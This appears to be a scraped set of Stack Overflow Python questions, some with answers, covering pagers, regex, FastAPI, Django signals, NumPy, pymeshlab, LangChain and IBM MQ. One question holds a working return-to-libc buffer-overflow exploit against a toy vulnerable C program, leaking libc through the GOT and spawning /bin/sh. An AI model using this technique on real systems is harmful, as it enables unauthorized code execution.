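Passing `brands` into `addBullet` and returning the updated dict avoids the `global` and is usually the cleaner design.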
<python><dictionary>
2024-01-13 16:16:32
1
501
Francesco
77,811,984
2,437,508
python - can't come back when reaching EOF when using less as a pager
<p>I am using <code>less</code> as a pager so that output of the application can be read easily. I create the subprocess like this:</p> <pre><code>a_process = subprocess.Popen([&quot;less&quot;], stdin=subprocess.PIPE) </code></pre> <p>Then I write into the pager like this (multiple lines):</p> <pre><code>a_process.stdin.write(&quot;hello\n&quot;.encode()) a_process.stdin.flush() </code></pre> <p>Before I finish execution I call <code>a_process.wait()</code> and the user is able to move up and down as expected.... if the user hits <code>q</code> the pager ends and the python application ends as there is no more stuff in the python script.... <em>however</em>, if the user reaches the end of the output I provided to <code>less</code>, the UI freezes.... the user can't go up, can't quit using <code>q</code>... only <code>ctrl-c</code> will work to finish execution.</p> <p>What piece am I missing to avoid reaching this state?</p>
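`less` keeps trying to read from its stdin until it sees EOF, and EOF only arrives once the write end of the pipe is closed, so closing `a_process.stdin` before `wait()` is the likely missing piece. The sketch below uses `cat` as a non-interactive stand-in for the pager (assumes a POSIX system with `cat` on the PATH):

```python
import subprocess

# `cat` stands in for the pager here: like `less`, it keeps reading until
# its stdin reaches EOF.
proc = subprocess.Popen(["cat"], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
proc.stdin.write(b"hello\n")
proc.stdin.flush()

# Without this close(), proc.wait() would hang forever: the child never
# sees EOF while our write end of the pipe stays open. The same mechanism
# is what freezes `less` when the user scrolls past the end of the output.
proc.stdin.close()

proc.wait()
assert proc.returncode == 0
assert proc.stdout.read() == b"hello\n"
```

With `less` itself, write everything, then `a_process.stdin.close()`, then `a_process.wait()`; once `less` has EOF it behaves normally at the end of the buffer and `q` works everywhere.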
<python><subprocess><less>
2024-01-13 15:28:41
1
31,374
eftshift0
77,811,879
5,177,326
How to match regex in contents from file in python?
<p>This forum is full of similar questions, so here is mine:</p> <pre><code>import re import subprocess rx = re.compile(&quot;(?m)^\(cpu\)\(.*\)&quot;) output = subprocess.run([&quot;cat&quot;,&quot;/proc/cpuinfo&quot;], stdout=subprocess.PIPE) lines = output.stdout.decode('utf-8') r = rx.search(lines) if r: print(r.groups()) </code></pre> <p>I expect this snippet to find some <code>cpu</code> in the multi-line file, but nothing is shown. (The actual code that fails for me looks of course different, but this is the simplest test case that fails for me, and I cannot figure out why...)</p>
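The backslashes are the bug: `\(` matches a literal parenthesis, so the pattern looks for the text `(cpu)(...)`, which never occurs in `/proc/cpuinfo`. Unescaped parentheses are the capture groups. A self-contained check against a fabricated `/proc/cpuinfo` excerpt:

```python
import re

sample = (
    "processor\t: 0\n"
    "cpu family\t: 6\n"
    "model name\t: Example CPU\n"
    "cpu MHz\t\t: 2400.000\n"
)

# The original pattern escapes the parentheses, so it searches for the
# literal text "(cpu)(...)" and finds nothing.
assert re.search(r"(?m)^\(cpu\)\(.*\)", sample) is None

# Unescaped parentheses are capture groups; a raw string also avoids the
# separate problem of "\(" being a dubious escape in a plain string literal.
match = re.search(r"(?m)^(cpu)(.*)", sample)
assert match is not None
assert match.groups() == ("cpu", " family\t: 6")
```

As a side note, `open('/proc/cpuinfo').read()` reads the file directly and saves the `cat` subprocess.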
<python><regex>
2024-01-13 14:58:05
2
328
olh
77,811,835
7,478,525
How to configure two microservices using Python (uvicorn/fastapi/requests) to call each other in one use case?
<p>I have two microservices. Let's name them <code>service1</code> and <code>service2</code>. I have implemented an endpoint on <code>service1</code> which calls an endpoint from <code>service2</code>. To fulfill this request, an endpoint from <code>service2</code> needs some data from <code>service1</code>, so <strong>it calls another endpoint</strong> from <code>service1</code>. And usually this works fine and both services are getting 200 REST responses, so there is no issue.</p> <p>BUT sometimes one of the microservices receives wrong data or there is some network issue and then <strong>both microservices freeze and the pods on Kubernetes restart. From the user's perspective it throws a 502 (bad gateway) error in the web browser.</strong> In the logs I can see that the POST request is made, but then nothing more is logged and I can only see uvicorn's startup logs, something like this:</p> <pre><code>INFO: Started server process [1490] INFO: Waiting for application startup. INFO: Application startup complete. INFO: Uvicorn running on http://0.0.0.0:8080 (Press CTRL+C to quit) </code></pre> <p>To be more precise, both microservices use FastAPI as their main framework and they are running on Python's uvicorn, and the requests are posted with the standard &quot;requests&quot; package like this:</p> <pre><code>import requests url = 'https://www.example.com/some-endpoint' myobj = {'somekey': 'somevalue'} x = requests.post(url, json = myobj) </code></pre> <p>So my question is - <strong>how to configure both microservices to avoid such situations?</strong> Is there any flag in uvicorn or requests that I can specify to prevent apps from crashing like this? Or is there maybe a different method of communication for such a use case, like queues in RabbitMQ or something similar? I'm open to suggestions.</p>
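One common cause of exactly this freeze: calling the blocking `requests.post` inside an `async def` endpoint stops the whole event loop, so while service1 waits on service2, it cannot answer service2's callback, and both sides hang until the pods are killed. Two mitigations that usually help are always passing a `timeout` to the HTTP call and keeping the loop free, e.g. via `await asyncio.to_thread(...)` or an async client such as httpx. A small loop-starvation demo, with `time.sleep` standing in for the blocking `requests.post`:

```python
import asyncio
import time

async def heartbeat(ticks):
    # plays the role of "another incoming request" the server should serve
    for _ in range(4):
        ticks.append(time.monotonic())
        await asyncio.sleep(0.05)

async def blocking_call():
    await asyncio.sleep(0.01)      # let the heartbeat start first
    time.sleep(0.2)                # requests.post(...) behaves like this

async def async_call():
    await asyncio.sleep(0.01)
    # offload to a thread so the loop stays responsive; with httpx you
    # could `await client.post(..., timeout=5)` directly instead
    await asyncio.to_thread(time.sleep, 0.2)

async def measure(call):
    ticks = []
    await asyncio.gather(heartbeat(ticks), call())
    return max(b - a for a, b in zip(ticks, ticks[1:]))

blocked_gap = asyncio.run(measure(blocking_call))
friendly_gap = asyncio.run(measure(async_call))
assert blocked_gap > 0.15    # event loop frozen while the blocking call ran
assert friendly_gap < 0.15   # loop stayed free to serve other requests
```

A plain `def` endpoint (FastAPI runs those in a threadpool) plus `requests.post(url, json=myobj, timeout=5)` is an even simpler fix if you want to keep the `requests` package.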
<python><rest><microservices><fastapi><uvicorn>
2024-01-13 14:46:50
1
783
westman379
77,811,591
1,186,421
Django 5 signal asend: unhashable type list
<p>Trying to make a short example with django 5 async signal. Here is the code:</p> <p>View:</p> <pre class="lang-py prettyprint-override"><code>async def confirm_email_async(request, code): await user_registered_async.asend( sender=User, ) return JsonResponse({&quot;status&quot;: &quot;ok&quot;}) </code></pre> <p>Signal:</p> <pre class="lang-py prettyprint-override"><code>user_registered_async = Signal() @receiver(user_registered_async) async def async_send_welcome_email(sender, **kwargs): print(&quot;Sending welcome email...&quot;) await asyncio.sleep(5) print(&quot;Email sent&quot;) </code></pre> <p>The error trace is:</p> <pre><code>Traceback (most recent call last): File &quot;C:\Users\karonator\AppData\Roaming\Python\Python311\site-packages\asgiref\sync.py&quot;, line 534, in thread_handler raise exc_info[1] File &quot;C:\Users\karonator\AppData\Roaming\Python\Python311\site-packages\django\core\handlers\exception.py&quot;, line 42, in inner response = await get_response(request) ^^^^^^^^^^^^^^^^^^^^^^^^^^^ File &quot;C:\Users\karonator\AppData\Roaming\Python\Python311\site-packages\asgiref\sync.py&quot;, line 534, in thread_handler raise exc_info[1] File &quot;C:\Users\karonator\AppData\Roaming\Python\Python311\site-packages\django\core\handlers\base.py&quot;, line 253, in _get_response_async response = await wrapped_callback( ^^^^^^^^^^^^^^^^^^^^^^^ File &quot;C:\Users\karonator\Desktop\signals\main\views.py&quot;, line 34, in confirm_email_async await user_registered_async.asend( File &quot;C:\Users\karonator\AppData\Roaming\Python\Python311\site-packages\django\dispatch\dispatcher.py&quot;, line 250, in asend responses, async_responses = await asyncio.gather( ^^^^^^^^^^^^^^^ File &quot;C:\Program Files\Python311\Lib\asyncio\tasks.py&quot;, line 819, in gather if arg not in arg_to_fut: ^^^^^^^^^^^^^^^^^^^^^ TypeError: unhashable type: 'list' </code></pre> <p>Will be grateful for any help, already broken my head. Thanks for your time.</p>
<python><django><python-asyncio><django-signals>
2024-01-13 13:31:18
1
2,673
KaronatoR
77,811,394
15,671,866
Buffer overflow script using subprocess
<p>This is my <code>vuln.c</code> code:</p> <pre class="lang-c prettyprint-override"><code>#include &lt;stdio.h&gt; #include &lt;unistd.h&gt; // this function is added because I need that sequence of assembly instructions in the binary file void oh_look_useful() { asm(&quot;pop %rdi; ret&quot;); } int vuln() { char buf[80]; int r; r = read(0, buf, 400); puts(&quot;No shell for you :(&quot;); return 0; } int main(int argc, char *argv[]) { printf(&quot;Try to exec /bin/sh\n&quot;); vuln(); return 0; } </code></pre> <p>This code has to be compiled with the flag <code>-no-pie</code> to make the buffer overflow exploitable, for example:</p> <pre><code>gcc vuln.c -no-pie -o vuln </code></pre> <p>So, running the C program, it does a print, then waits for user input, and then another print occurs. My python exploit has to send a payload which has to leak the libc base address, restart the program and then make a call to <code>system('/bin/sh')</code>. A good explanation of how this is possible can be found <a href="https://blog.techorganic.com/2016/03/18/64-bit-linux-stack-smashing-tutorial-part-3/" rel="nofollow noreferrer">here</a>, but for this particular code the payload that makes the leak and restarts the program is built as follows:</p> <pre class="lang-py prettyprint-override"><code>def p64(x): return struct.pack(&quot;&lt;Q&quot;, x) # used variables can be found in many ways, such as the previously linked guide payload = ( b&quot;A&quot; * 104 + p64(pop_rdi_addr) + p64(read_got_addr) + p64(puts_plt_addr) + p64(main_addr) ) </code></pre> <p>Now it's time to send the payload; here's what I tried:</p> <pre class="lang-py prettyprint-override"><code>process = subprocess.Popen( FILENAME, stdin=subprocess.PIPE, stdout=subprocess.PIPE) 
with process.stdin as pipe: pipe.write(payload) process.stdout.readline() process.stdout.readline() leaked_data = process.stdout.readline() leaked_addr = u64(leaked_data.ljust(8, b&quot;\x00&quot;)) print(f&quot;Leaked addr: {hex(leaked_addr)}\n&quot;) </code></pre> <p>The correct address is printed. Now the C program is restarted, and it's waiting for another payload. This is the one which is going to call <code>system('/bin/sh')</code>. In my case, the working one is:</p> <pre class="lang-py prettyprint-override"><code>payload = b'A' * RIP_OFFSET + p64(pop_rdi_addr) + p64(bin_sh_addr) # If sigseg occurs when sending payload, try to remove following line payload += p64(pop_rdi_addr + 1) # but keep this line payload += p64(system_addr) </code></pre> <p>As before, addresses may be found in several ways. Now it's time to send payload and get shell:</p> <pre class="lang-py prettyprint-override"><code>with process.stdin as pipe: pipe.write(payload) </code></pre> <p>but for sure it's not going to work because the <code>stdin</code> has been already closed. 
Then I tried:</p> <ul> <li>to put everything into the same <code>with process.stdin as pipe:</code>, but the script is blocked on the very first <code>process.readline()</code>.</li> <li>to add a trailing <code>b'\x0a'</code> to the payload, which is the byte for '\n', but nothing changed.</li> <li>to remove any <code>with</code> and use:</li> </ul> <pre class="lang-py prettyprint-override"><code>process.stdin.write(payload) process.stdin.flush() process.stdout.readline() process.stdout.readline() </code></pre> <p>but nothing changes again.</p> <p>I also tried:</p> <pre class="lang-py prettyprint-override"><code>payload = ( b&quot;A&quot; * 104 + p64(pop_rdi_addr) + p64(read_got_addr) + p64(puts_plt_addr) + p64(main_addr) ) master_fd, slave_fd = pty.openpty() ts = termios.tcgetattr(master_fd) ts[3] &amp;= ~(termios.ICANON | termios.ECHO) termios.tcsetattr(master_fd, termios.TCSANOW, ts) process = subprocess.Popen( FILENAME, stdin=slave_fd, stdout=slave_fd, preexec_fn=lambda: os.close(master_fd)) try: os.close(slave_fd) master = os.fdopen(master_fd, 'rb+', buffering=0) print('first read') print(repr(master.readline())); master.write(payload); master.flush() print(repr(master.readline())); leaked_data = master.readline(); except Exception as e: print(&quot;Exception occurs:&quot;) print(str(e)) exit(-1) leaked_addr = u64(leaked_data.ljust(8, b'\x00')) </code></pre> <p>based on <a href="https://stackoverflow.com/questions/77802033/c-program-and-subprocess/77807014?noredirect=1#comment137172674_77807014">this more general question</a>, but I got an exception:</p> <pre><code>python script.py Starting leaking... first read b'Try to exec /bin/sh\r\n' b'No shell for you :(\r\n' Exception occurs: [Errno 5] Input/output error </code></pre> <p>The error occurs when the script tries to read the leaked address. In the last scenario, I'm not able to tell whether the C program crashes before leaking the address or whether the problem is in the python script. 
I'm sure that the payloads are correct, because I've already written the same script using the <code>pwntools</code> library and it works, but since the script has to run on the target machine and <code>pwntools</code> is not built-in, I want to prepare a more general one which only uses built-in libraries.</p> <p>Another thing to keep in mind is that, at the end of the script, I have to continuously interact with the spawned bash, so the stdin/stdout of the process has to be connected to the python script.</p> <p>So my question: how can I get the subprocess to communicate correctly with the C program?</p>
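The `with process.stdin as pipe:` block is what closes the pipe after round one. Keeping the raw pipes open and flushing after each write supports as many request/response rounds as needed, which is the pattern both the leak stage and the final interactive shell require. A stand-alone sketch with a small Python child echoing lines in place of the vulnerable binary (the child program here is purely illustrative):

```python
import subprocess
import sys

# Two request/response rounds over the *same* pipes. Key points: never wrap
# process.stdin in a `with` block (that closes it after the first payload),
# and flush after every write.
child = subprocess.Popen(
    [sys.executable, "-u", "-c",
     "import sys\n"
     "while True:\n"
     "    line = sys.stdin.readline()\n"
     "    if not line:\n"
     "        break\n"
     "    sys.stdout.write('got ' + line)\n"
     "    sys.stdout.flush()\n"],
    stdin=subprocess.PIPE, stdout=subprocess.PIPE)

child.stdin.write(b"payload-1\n")
child.stdin.flush()                      # do NOT close: more rounds follow
assert child.stdout.readline() == b"got payload-1\n"

child.stdin.write(b"payload-2\n")
child.stdin.flush()
assert child.stdout.readline() == b"got payload-2\n"

child.stdin.close()                      # send EOF only when truly done
child.wait()
```

For the final interactive stage, a simple loop that forwards your `sys.stdin` lines to `child.stdin` and mirrors `child.stdout` back can stand in for pwntools' `interactive()`.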
<python><c><subprocess><buffer-overflow>
2024-01-13 12:21:55
0
585
ma4stro
77,810,920
1,473,517
How to find pair of subarrays with maximal sum
<p>Given an array of integers, I can find the maximal subarray sum using <a href="https://en.wikipedia.org/wiki/Maximum_subarray_problem" rel="nofollow noreferrer">Kadane's algorithm</a>. In code this looks like:</p> <pre><code>def kadane(arr, n): # initialize subarray_sum, max_subarray_sum and subarray_sum = 0 max_subarray_sum = np.int32(-2**31) # Just some initial value to check # for all negative values case finish = -1 # local variable local_start = 0 for i in range(n): subarray_sum += arr[i] if subarray_sum &lt; 0: subarray_sum = 0 local_start = i + 1 elif subarray_sum &gt; max_subarray_sum: max_subarray_sum = subarray_sum start = local_start finish = i # There is at-least one # non-negative number if finish != -1: return max_subarray_sum, start, finish # Special Case: When all numbers in arr[] are negative max_subarray_sum = arr[0] start = finish = 0 # Find the maximum element in array for i in range(1, n): if arr[i] &gt; max_subarray_sum: max_subarray_sum = arr[i] start = finish = i return max_subarray_sum, start, finish </code></pre> <p>This is fast and works well. However, I would like to find a pair of subarrays with maximal sum. Take this example input.</p> <pre><code>arr = [3, 3, 3, -8, 3, 3, 3] </code></pre> <p>The maximal subarray is the entire array with sum 10. But if I am allowed to take two subarrays they can be [3, 3, 3] and [3, 3, 3] which has sum 18.</p> <p>Is there a fast algorithm to compute the maximal pair of subarrays? I am assuming the two subarrays will not overlap.</p>
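Yes: run Kadane twice, once left-to-right and once right-to-left, and combine. `left[i]` is the best single-subarray sum inside `arr[:i+1]`, `right[i]` the best inside `arr[i:]`, and the answer is the best `left[i] + right[i+1]` over all split points, still O(n) overall. A sketch (assumes the two subarrays are non-empty and non-overlapping):

```python
def max_two_subarrays(arr):
    n = len(arr)
    # left[i]: best single-subarray sum within arr[0..i] (prefix Kadane)
    left = [0] * n
    best = cur = arr[0]
    left[0] = best
    for i in range(1, n):
        cur = max(arr[i], cur + arr[i])
        best = max(best, cur)
        left[i] = best
    # right[i]: best single-subarray sum within arr[i..n-1] (suffix Kadane)
    right = [0] * n
    best = cur = arr[-1]
    right[-1] = best
    for i in range(n - 2, -1, -1):
        cur = max(arr[i], cur + arr[i])
        best = max(best, cur)
        right[i] = best
    # combine: one subarray ends by index i, the other starts at i + 1
    return max(left[i] + right[i + 1] for i in range(n - 1))

assert max_two_subarrays([3, 3, 3, -8, 3, 3, 3]) == 18   # the example above
assert max_two_subarrays([1, -1, 1]) == 2
assert max_two_subarrays([-5, -2, -3]) == -5             # all-negative case
```

Tracking start/end indices alongside `best`, as in the single-subarray version, recovers the two subarrays themselves.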
<python><algorithm><performance>
2024-01-13 09:25:51
2
21,513
Simd
77,810,703
3,337,089
Loading video using scikit-video latest version and numpy latest version gives numpy has no float attribute error
<p>I have installed the latest version of <code>scikit-video=1.1.11</code> and the latest version of <code>numpy=1.26.1</code>. When trying to load a video as</p> <pre><code>&gt;&gt;&gt; import skvideo.io &gt;&gt;&gt; skvideo.io.vread('video_path.mp4') </code></pre> <p>I get the following error</p> <pre><code>Traceback (most recent call last): File &quot;&lt;stdin&gt;&quot;, line 1, in &lt;module&gt; File &quot;/home/user/anaconda3/envs/snb/lib/python3.10/site-packages/skvideo/io/io.py&quot;, line 144, in vread reader = FFmpegReader(fname, inputdict=inputdict, outputdict=outputdict, verbosity=verbosity) File &quot;/home/user/anaconda3/envs/snb/lib/python3.10/site-packages/skvideo/io/ffmpeg.py&quot;, line 44, in __init__ super(FFmpegReader,self).__init__(*args, **kwargs) File &quot;/home/user/anaconda3/envs/snb/lib/python3.10/site-packages/skvideo/io/abstract.py&quot;, line 87, in __init__ if np.float(parts[1]) == 0.: File &quot;/home/user/anaconda3/envs/snb/lib/python3.10/site-packages/numpy/__init__.py&quot;, line 324, in __getattr__ raise AttributeError(__former_attrs__[attr]) AttributeError: module 'numpy' has no attribute 'float'. `np.float` was a deprecated alias for the builtin `float`. To avoid this error in existing code, use `float` by itself. Doing this will not modify any behavior and is safe. If you specifically wanted the numpy scalar type, use `np.float64` here. The aliases was originally deprecated in NumPy 1.20; for more details and guidance see the original release note at: https://numpy.org/devdocs/release/1.20.0-notes.html#deprecations. Did you mean: 'cfloat'? </code></pre> <p>The error goes away if I install older version of <code>numpy=1.23.5</code> as suggested <a href="https://stackoverflow.com/a/74864409/3337089">in this answer</a>. 
The answer notes that <code>float</code> attribute is deprecated in <code>numpy=1.20</code> and removed in <code>numpy=1.24</code>.</p> <p>So, why has <code>scikit-video</code> not updated this in their latest version? Is there no way to use latest <code>numpy</code> with <code>scikit-video</code>?</p>
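Until scikit-video ships a release that drops the removed aliases, a common stopgap is to restore them on the `numpy` module before importing `skvideo` (a workaround, not verified against every skvideo code path):

```python
import numpy as np

# scikit-video 1.1.11 still references aliases removed in NumPy 1.24;
# restoring them before `import skvideo.io` sidesteps the AttributeError.
if not hasattr(np, "float"):
    np.float = float
    np.int = int          # skvideo touches this removed alias as well

# import skvideo.io      # now imports without the np.float error
assert np.float is float
```

Pinning `numpy<1.24` (as in the linked answer) remains the safer option if reproducibility matters more than having the latest NumPy.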
<python><numpy><video><scikits>
2024-01-13 07:56:47
1
7,307
Nagabhushan S N
77,810,665
10,896,941
Is it possible to make non-first tab selected in PySimpleGUI window startup?
<pre><code>window = sg.Window(&quot;foobar&quot;, layout, margins=(2, 2), finalize=True) window.Element('-ENCR_TAB-').Select() </code></pre> <p>What I see is that the first tab is selected and only after a little while the '-ENCR_TAB-' (the second tab) is selected as expected. Is it possible to have it selected by default without such a delay?</p>
<python><user-interface><pysimplegui>
2024-01-13 07:42:44
2
410
Jiri B
77,810,565
6,202,327
Pymeshlab claiming files are not present when they are?
<p>I have two pymeshlab scripts:</p> <pre class="lang-py prettyprint-override"><code>import os import argparse import pymeshlab from collections import Counter def load_mesh(file_path): ms = pymeshlab.MeshSet() ms.load_new_mesh(file_path) measures = ms.get_topological_measures() print(measures) def main(): # Parse command-line arguments parser = argparse.ArgumentParser(description=&quot;Count the number of 'ok' meshes in a directory.&quot;) parser.add_argument(&quot;-i&quot;, &quot;--input&quot;, required=True, help=&quot;Path to the directory containing OBJ files.&quot;) args = parser.parse_args() results = load_mesh(args.input) if __name__ == &quot;__main__&quot;: main() </code></pre> <p>And</p> <pre class="lang-py prettyprint-override"><code>import os import argparse import pymeshlab from collections import Counter def is_mesh_ok(file_path): try: ms = pymeshlab.MeshSet() ms.load_new_mesh(file_path) measures = ms.get_topological_measures() except Exception as e: print(f&quot;Failed to load mesh '{file_path}': {e}&quot;) return &quot;Load Failed&quot; genus = measures['genus'] connected_components = measures['connected_components_number'] is_two_manifold = measures['is_mesh_two_manifold'] hole_count = measures['number_holes'] is_ok = (genus == 0) and (connected_components == 1) and (is_two_manifold is True) and (hole_count == 0) if is_ok: return &quot;OK&quot; else: failed_criteria = [] if genus != 0: failed_criteria.append(&quot;Genus&quot;) if connected_components != 1: failed_criteria.append(&quot;Connected Components&quot;) if not is_two_manifold: failed_criteria.append(&quot;Is Two Manifold&quot;) if hole_count != 0: failed_criteria.append(&quot;Number of Holes&quot;) return &quot;, &quot;.join(failed_criteria) def count_ok_meshes(directory_path): results = [] for filename in os.listdir(directory_path): if filename.endswith('.obj'): file_path = os.path.join(directory_path, filename) result = is_mesh_ok(file_path) results.append(result) return results def 
main(): # Parse command-line arguments parser = argparse.ArgumentParser(description=&quot;Count the number of 'ok' meshes in a directory.&quot;) parser.add_argument(&quot;-d&quot;, &quot;--directory&quot;, required=True, help=&quot;Path to the directory containing OBJ files.&quot;) args = parser.parse_args() results = count_ok_meshes(args.directory) counter = Counter(results) print(&quot;Histogram of Failed Criteria:&quot;) for key, value in counter.items(): print(f&quot;{key}: {value}&quot;) if __name__ == &quot;__main__&quot;: main() </code></pre> <p>I am calling both on the same files, which are in the same directory. The short script works, but the large one claims it cannot find some of the files, and I don't understand how. For example, the large one shows this error:</p> <pre><code>Failed to load mesh 'clean_results/mesh703.obj': File does not exists: clean_results/mesh703.obj </code></pre> <p>For the exact same file, the small one returns:</p> <pre class="lang-py prettyprint-override"><code>{'boundary_edges': 0, 'connected_components_number': 1, 'edges_number': 4629, 'faces_number': 3086, 'genus': 0, 'incident_faces_on_non_two_manifold_edges': 0, 'incident_faces_on_non_two_manifold_vertices': 0, 'is_mesh_two_manifold': True, 'non_two_manifold_edges': 0, 'non_two_manifold_vertices': 0, 'number_holes': 0, 'unreferenced_vertices': 0, 'vertices_number': 1545} </code></pre> <p>It also only happens with some files, not all, and seems to change between invocations. I don't understand how this is happening. Why is the large script failing to find files using the exact same logic the small one is using?</p>
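Since the failures change between invocations, one thing worth ruling out (an assumption on my part, not something the scripts above prove) is a relative-path or working-directory issue: building absolute paths before handing them to pymeshlab makes that failure mode unambiguous. A sketch of the directory walk, with the pymeshlab calls left out so it runs anywhere:

```python
import os

def absolute_obj_paths(directory_path):
    """Return absolute paths of all .obj files, verifying each exists first."""
    paths = []
    root = os.path.abspath(directory_path)
    for filename in sorted(os.listdir(root)):
        if filename.endswith(".obj"):
            file_path = os.path.join(root, filename)
            # If this assertion ever fires, the directory listing itself is unstable
            assert os.path.isfile(file_path), f"listed but missing: {file_path}"
            paths.append(file_path)
    return paths
```

Feeding each returned path to `ms.load_new_mesh(...)` should then isolate the problem: if pymeshlab still reports "File does not exists" for a path this function just verified, the issue is inside the loader rather than the directory walk.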
<python><geometry><mesh><pymeshlab>
2024-01-13 06:53:25
0
9,951
Makogan
77,810,548
3,547,851
Langchain model to extract key information from pdf
<p>I was looking for a solution to extract <strong>key information</strong> from a PDF based on my instructions.</p> <p>Here's what I've done:</p> <ol> <li>Extract the PDF text using OCR</li> <li>Use the LangChain splitter, CharacterTextSplitter, to split the text into chunks</li> <li>Use LangChain, FAISS, and OpenAIEmbeddings to extract information based on the instruction</li> </ol> <p>The problems that I faced are:</p> <ol> <li>Sometimes the first several items in the doc are skipped</li> <li>It only returns a few items instead of all of them. Say there are 1000 items: because of ChatGPT's limit on response length, I asked for 20 products first, but how can I continue to grab the rest of the products, so I can combine them later?</li> </ol> <p>I am using gpt-3.5-turbo for now.</p> <p>The goals are:</p> <ol> <li>It should return all goods listed in the PDF doc, which could be thousands (remember there is a GPT token limit on the response).</li> </ol> <p>My question is:</p> <ol> <li>What are the best LangChain models or methods to achieve my goals?</li> </ol> <p>(I'm quite new to this LangChain world.)</p> <p>This is the code</p> <pre><code>from langchain.text_splitter import CharacterTextSplitter from langchain_community.vectorstores import faiss from langchain.chains.question_answering import load_qa_chain from langchain.chains import ( StuffDocumentsChain, LLMChain, ConversationalRetrievalChain) from langchain_core.prompts import PromptTemplate from langchain_openai import ChatOpenAI, OpenAIEmbeddings import os import sentry_sdk from flask_cors import CORS, cross_origin from instructions import (GOODS_INSTRUCTION_V2, GOODS_INSTRUCTION_WITH_LIMIT_20_V2) from flask import Flask, request, jsonify, abort import json import concurrent.futures from pdf2image import convert_from_path import pytesseract import requests from datetime import datetime from urllib.parse import unquote from pathlib import Path import os from 
typing_extensions import Concatenate from utils import Utils app = Flask(__name__) CORS(app) utils = Utils() llm = ChatOpenAI(temperature=0, model_name=&quot;gpt-3.5-turbo&quot;, openai_api_key=&quot;abc123&quot;, max_tokens=2000) @app.route('/upload', methods=['POST']) def upload_file(): start_time = datetime.now() if 'file' not in request.files: return &quot;No file part&quot; file = request.files['file'] if file.filename == '': return &quot;No selected file&quot; # Save the uploaded file and get its filename filename = utils.save_uploaded_file(file) embeddings = OpenAIEmbeddings() # Construct expected text file path expected_text_file = os.path.splitext(filename)[0] + &quot;.txt&quot; expected_text_file = expected_text_file.replace(&quot;uploads/&quot;, &quot;output/&quot;) print(&quot;Expected text file:&quot;, expected_text_file) file_size = 0 if os.path.exists(expected_text_file): with open(expected_text_file, 'r', encoding='utf-8') as file: extracted_text = file.read() print(&quot;Text loaded from existing file&quot;) else: # Check file size file_size = os.path.getsize(filename) # Extract text from the PDF or use OCR if needed extracted_text = utils.extract_text_from_pdf_using_ocr(filename) text_splitter = CharacterTextSplitter( separator=&quot;\n&quot;, chunk_size=800, chunk_overlap=200, length_function=len, ) chunks = text_splitter.split_text(extracted_text) print(&quot;Chunks Length:&quot;, len(chunks)) document_search = faiss.FAISS.from_texts(chunks, embeddings) ai_response = start_ai_processing( document_search, GOODS_INSTRUCTION_WITH_LIMIT_20_V2, 'gpt-3.5-turbo') end_time = datetime.now() utils.send_slack_message( filename, file_size, start_time, end_time, ai_response, 'gpt-3.5-turbo') return jsonify({'data': ai_response}) def start_ai_processing(document_search, instruction, gpt_model='gpt-3.5-turbo'): chain = load_qa_chain(llm, chain_type=&quot;stuff&quot;) query = instruction docs = document_search.similarity_search(query) result = 
chain.run(input_documents=docs, question=query) result = result.replace( &quot;```json\n&quot;, &quot;&quot;).replace(&quot;\n```&quot;, &quot;&quot;).replace(&quot;\n&quot;, &quot;&quot;) print(&quot;Result:&quot;, result) parsed_response = json.loads(result) return parsed_response if __name__ == '__main__': app.run(debug=True, port=6000, threaded=False) </code></pre> <p>This is the instruction:</p> <pre><code>GOODS_INSTRUCTION_WITH_LIMIT_20_V2 = (&quot;&quot;&quot; Task: Extract Goods Information from Shipping Invoice and Format as JSON Objective: Analyze a shipping invoice and exclusively extract the list of goods, presenting the details in a structured JSON format with camelCase key names. Maintain the specific document order. Details to Extract for Each Good: Product Code,HS Code / Item Code,Product Description,Quantity,Unit Price / Net,Total Price / Extension,Nett Weight,Gross Weight,Total Volume Extraction and Formatting Instructions: 1.Sequentially retrieve data from the first page to the end. 2.List items exactly as they appear without combining them. 3.For quantity, you can get from total price / unit price 4.Return data in a well-structured JSON format. Any JSON formatting error will result in task failure. 5. Maximum 20 items in the goods list, if there are more than 20 items, just return 20 items and stop processing the rest. The structure of json should be like this: { &quot;goods&quot;: [ { &quot;productCode&quot;: &quot;&quot;, &quot;hsCode&quot;: &quot;&quot;, &quot;productDescription&quot;: &quot;&quot;, &quot;quantity&quot;: 0.0, &quot;unitPrice&quot;: 0.0, &quot;totalPrice&quot;: 0.0, &quot;nettWeight&quot;: 0.0, &quot;grossWeight&quot;: 0.0, &quot;totalVolume&quot;: 0.0 } ] } &quot;&quot;&quot;) </code></pre> <p><strong>Any help will be appreciated!</strong> Thanks</p>
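For the second problem (getting 1000 items 20 at a time), one option, independent of which model is used, is to request successive pages ("items 21 to 40", and so on) and merge the JSON chunks client-side. The helper below sketches only the merging step; using `productCode` as the de-duplication key is my assumption, not something the invoice format guarantees:

```python
import json

def merge_goods_pages(pages):
    """Merge several {'goods': [...]} page dicts, de-duplicating by productCode."""
    seen = set()
    merged = []
    for page in pages:
        for item in page.get("goods", []):
            # Fall back to the whole item as a key when productCode is missing
            key = item.get("productCode") or json.dumps(item, sort_keys=True)
            if key not in seen:
                seen.add(key)
                merged.append(item)
    return {"goods": merged}
```

Each paginated model response, once parsed with `json.loads`, can be appended to a list and merged at the end with this function.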
<python><openai-api><langchain><chatgpt-api><chat-gpt-4>
2024-01-13 06:43:17
0
1,143
Webster
77,810,507
8,211,382
How to browse the message based on MsgId or CorrelId from queue in pymqi
<pre><code>import pymqi queue_manager = 'QM1' channel = 'DEV.APP.SVRCONN' host = '127.0.0.1' port = '1414' queue_name = 'TEST.1' message = 'Hello from Python 2!' conn_info = '%s(%s)' % (host, port) </code></pre> <p>First I did the PUT operation like the code below, and it worked fine. I put more than 2000 messages.</p> <pre><code>qmgr = pymqi.connect(queue_manager, channel, conn_info) queue = pymqi.Queue(qmgr, queue_name) queue.put(message) queue.close() qmgr.disconnect() </code></pre> <p>I tried the below code to get the first message, and it also worked fine. It gives me the first message. I don't know if this is the correct approach to get the first message.</p> <pre><code>queue = pymqi.Queue(qmgr, queue_name, pymqi.CMQC.MQOO_BROWSE) gmo = pymqi.GMO() gmo.Options = pymqi.CMQC.MQGMO_WAIT | pymqi.CMQC.MQGMO_BROWSE_NEXT | pymqi.CMQC.MQGMO_NO_PROPERTIES gmo.WaitInterval = 5000 md = pymqi.MD() md.Format = pymqi.CMQC.MQFMT_STRING message = queue.get(None, md, gmo) print(message) # b'Hello from Python 2!' print(md.MsgId.hex()) #'414d51204e41544d333030202020202817d9ff650a742f22' queue.close() qmgr.disconnect() </code></pre> <p>The below code gives me the correct message, but I think it is not the best solution, because if I have 2000 messages it will iterate until the MsgId 